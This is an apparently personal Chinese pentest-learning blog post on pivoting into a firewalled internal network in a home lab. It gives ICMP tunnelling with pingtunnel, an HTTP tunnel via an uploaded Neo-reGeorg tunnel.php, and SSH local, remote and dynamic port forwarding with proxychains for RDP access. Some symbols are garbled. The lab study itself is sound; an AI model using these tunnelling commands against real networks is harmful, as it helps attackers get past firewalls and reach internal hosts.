在库言库建筑网站,知名品牌设计logo解析,05网伴你学,建筑英才网首页昨天讲了通过代理的形式#xff08;端口转发#xff09;实现了上线不出网的机器#xff0c;那么今天就来讲一下如何通过隧道上线不出网机器 目录
1.网络拓扑
2.开始做隧道#xff1f;No#xff01;#xff01;#xff01;
3.icmp隧道
4.HTTP隧道
5.SSH隧道
1.什么…昨天讲了通过代理的形式端口转发实现了上线不出网的机器那么今天就来讲一下如何通过隧道上线不出网机器 目录
1.网络拓扑
2.开始做隧道No
3.icmp隧道
4.HTTP隧道
5.SSH隧道
1.什么是ssh隧道
2.ssh隧道端口转发
3.SSH远程端口转发
4.ssh动态端口转发 1.网络拓扑
今天我youyouyouyouyoyoyo又配环境配到崩溃了是的配环境已经给我整麻了kali的网卡那里感觉有点问题怎么配都配不好所以我知难而退改换桥接 大概是这样的一个网络拓扑
2.开始做隧道No
第一部肯定不是做隧道啊你连防火墙给你通过什么流量都不知道做啥隧道做了流量也过不去所以正确的第一步是通过对应的流量探测去制定隧道的种类
3.icmp隧道
所谓的icmp隧道就是将数据包夹带在icmp的数据包中其中ICMP 隧道几乎在所有的网络环境中都是被允许的因此攻击者可以通过 ICMP 隧道绕过一些网络安全设备。
但是这个程序似乎在一些低版本的Windows上运行不了(缺少一些系统动态链接库文件)
虽然win11可以但是很多内网的环境都是用的win7 winserver这种的所以适用范围较窄感觉 即便是这样那也还是要将草走复现一下的
先是kali上的命令
sysctl -w net.ipv4.icmp_echo_ignore_all1 //用于禁用本机对icmp流量的应答
然后再win7靶机上运行
pingtunnel.exe -type server -noprint 1 -nolog 1
然后kali上运行以下命令意思就是将本机的8888作为scok5的连接端接口
bash pingtunnel -type client -l:8888 192.168.3.58 -sock5 1
最后就在kali上修改一个配置文件
vim /etc/proxychain4.conf //并且在底部添加一行socks5 127.0.0.1 8888 即可 就可以远程连接了
proxychains rdesktop 192.168.52.138
4.HTTP隧道
这个比较常见我们经常都是通过一个web漏洞去getshell的所以防火墙一般不会限制http流量
HTTP隧道有特别特别多今天来分享一个加密隧道穿透 Neoreg-reGeorg
下载连接 项目概览 - Neo-reGeorg - GitCode
开整先再摆一下网络拓扑以免忘记 先在kali上运行k后面可以跟上你自己的密码
python neoreg.py -k 你的密码
然后判断网站的语言我这个win7上搭建的是php的网站 我们在执行完kali的命令之后会生成一个文件夹 ---
选择对应的网站语言扔上去 我这里扔的是tunnel.php可以看见能成功访问 于是就在kali上执行这个命令意思就是开本地的8888端口来连接远程的php文件
python neoreg.py -k 你的密码 -u http://192.168.3.58/tunnel.php -p 8888
这就可以了肯定不是啊你还没开socks5的本地代理端口咳咳咳差点忘记说了
这个工具建立的是socks5代理所以你就开启对应的代理端口
vim /ect/proxychains4.conf 在这个文件的最底端加上这个指令 socks5 127.0.0.1 8888
然后就可以连接啦
proxychains rdesktop 192.168.52.138 //这个可以直接写内网的地址 这样就能成功连接上去了嘿嘿嘿 当然了http隧道可不止这一种tunna abptts pivotnaacci 这些都是http的隧道就不多枚举了
5.SSH隧道
众所周知在实战中一般服务器都是的Linux_like的于是小编就去下载了一个Ubuntu来玩一下 是时候该更新网络拓扑啦 于是这样我们就有了一台新的Linux服务器可以搞事情了
直接访问它的网站根目录下的文件hhhh~~~ 1.什么是ssh隧道
在实际中大部分的Linux服务器都支持ssh协议内网中的主机和设备以及边界的防火墙都允许ssh流量通过但是ssh除了可以远程连接还可以转发流量并且是加密转发进而突破防火墙限制
2.ssh隧道端口转发
首先确定Ubuntu的22端口开放以及知道它的账号密码 就可以在kali进行以下操作
ssh -L 8887 192.168.52.138:3389 whoami192.168.3.61 -p 22
这个的意思就是
kali先通过连接Ubuntu服务器又因为Ubuntu可以和内网通信 -L 意思为将靶机的3389端口的流量准发到攻击机的8887端口当kali访问本地的8887就等于在访问内网DC的3389端口
这样就可以同时连接上两台服务器 3.SSH远程端口转发
这个和本地端口转发有点类似不过要先获取它的root权限这个Linux不用于Linux
蚁剑是无法执行ssh的而且上线cs有点困难我不会于是就要在ubuntu上面敲这个代码
ssh -R 8887:192.168.52.138:3389 kali192.168.3.57 -p 22
前提是你的攻击机器kali开启22端口可以这样查看
sudo systemctl status ssh
没开启的话开启就好
sudo systemctl start ssh然后在你的Ubuntu上面输入kali的密码就能成功连接了 但是在你连接上了内网DC的时候Ubuntu也是连接上了你的kali 如果你的虚拟机配置不当或者说别的大佬有0day,是可以造成虚拟机越狱的那到时候你就惨了
4.ssh动态端口转发
所谓的动态端口转发就是建立起一个ssh加密的socks4/5的代理隧道我们需要在kali运行以下命令
ssh -D 8888 whoami192.168.3.61
然后就能连接上Ubuntu了其中的 -D意为建立socks5隧道流量走8888端口,去连接ubutu的22端口 当然了以上能成功是在socks5代理成功配置的情况下噢
满足上述条件就能实现内网穿透了远程上线成功 以上就是多种的协议对应的一些隧道当然还有很多像DNS RDP IPV6都是有对应隧道的这里我就不枚举了 明天讲什么呢 讲隧道穿透利用方法 多层代理反正向代理多级代理节点加密节点穿透对应工具部署 Byd我都期待起来了